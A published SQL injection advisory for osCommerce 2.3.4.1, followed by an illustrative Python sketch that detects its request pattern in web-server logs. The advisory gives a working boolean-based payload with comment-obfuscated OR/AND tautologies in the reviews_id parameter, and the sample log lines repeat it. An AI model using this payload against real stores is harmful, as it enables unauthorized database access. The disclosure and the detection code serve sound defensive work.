osCommerce 2.3.4.1 – ‘reviews_id’ SQL Injection

  • Author: Mehmet EMIROGLU
    Date: 2019-02-06
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/46330/
  • ####################################################################
    
    # Exploit Title: osCommerce 2.3.4.1 - 'reviews_id' SQL Vulnerabilities
    # Dork: N/A
    # Date: 05-02-2019
    # Exploit Author: Mehmet EMIROGLU
    # Vendor Homepage: https://www.oscommerce.com
    # Software Link: https://www.oscommerce.com/Products
    # Version: 2.3.4.1
    # Category: Webapps
    # Tested on: Wampp @Win
    # CVE: N/A
    # Software Description: osCommerce Online Merchant is a complete online
    # store solution that contains both a shop frontend and an administration
    # backend which can be easily configured and customized with over 8,855
    # free add-ons.
    
    ####################################################################
    
    # Vulnerabilities / Impact
    # The affected web application is osCommerce version 2.3.4.1.
    # Switch to the product reviews tab. Replace the ID value in the URL with
    # a high number value, for example change reviews_id=2 to 9999999,
    # then add the payload given under Attack Pattern to the end of the URL.
    
    ####################################################################
    
    # POC - SQL (Boolean Based)
    # Parameters : reviews_id
    # Attack Pattern : /**/oR/**/7096077=7096077/**/aNd/**/7193=7193
    # GET Request :
    http://localhost/oscommerce/catalog/product_reviews_write.php?products_id=19&reviews_id=99999999/**/oR/**/7096077=7096077/**/aNd/**/7193=7193
    
    ####################################################################
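
Detection sketch for the request pattern above, added here as an example and not part of the original advisory or of osCommerce: it scans web-server access-log lines for `reviews_id` / `products_id` values that are not plain integers and, after collapsing the `/**/` comments and mixed-case keywords used in the PoC, flags always-true numeric comparisons. The log format, sample lines, and the names `INT_PARAMS`, `normalize` and `inspect_line` are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: these parameters are integer IDs, as in the advisory's request.
INT_PARAMS = ("reviews_id", "products_id")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# "or N=M" / "and N=M" comparison of two numeric literals
COMPARISON = re.compile(r"\b(?:or|and)\s+(\d+)\s*=\s*(\d+)\b")

# Constructed sample log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Feb/2019:10:00:01 +0000] "GET /oscommerce/catalog/'
    'product_reviews_write.php?products_id=19&reviews_id=2 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [06/Feb/2019:10:00:09 +0000] "GET /oscommerce/catalog/'
    'product_reviews_write.php?products_id=19&reviews_id=99999999/**/oR/**/'
    '7096077=7096077/**/aNd/**/7193=7193 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [06/Feb/2019:10:02:30 +0000] "GET /oscommerce/catalog/'
    'product_reviews_write.php?products_id=19&reviews_id=abc HTTP/1.1" 200 5120',
]


def normalize(value):
    """Undo the PoC's obfuscation: comments as whitespace, mixed-case keywords."""
    value = SQL_COMMENT.sub(" ", value)
    return re.sub(r"\s+", " ", value).strip().lower()


def inspect_line(line):
    """Return (param, reason) findings for one access-log line."""
    match = REQUEST.search(line)
    if not match:
        return []
    findings = []
    # parse_qsl URL-decodes values and splits each pair on the first '=' only.
    for name, raw in parse_qsl(urlsplit(match.group(1)).query):
        if name not in INT_PARAMS or (raw.isascii() and raw.isdigit()):
            continue
        pairs = COMPARISON.findall(normalize(raw))
        if any(a == b for a, b in pairs):
            findings.append((name, "always-true comparison appended to ID"))
        else:
            findings.append((name, "non-integer value"))
    return findings


if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(inspect_line(entry) or "clean")
```

Because the check keys on "integer parameter carries anything but digits", it also catches variants that do not match the comparison pattern; those are reported as non-integer values.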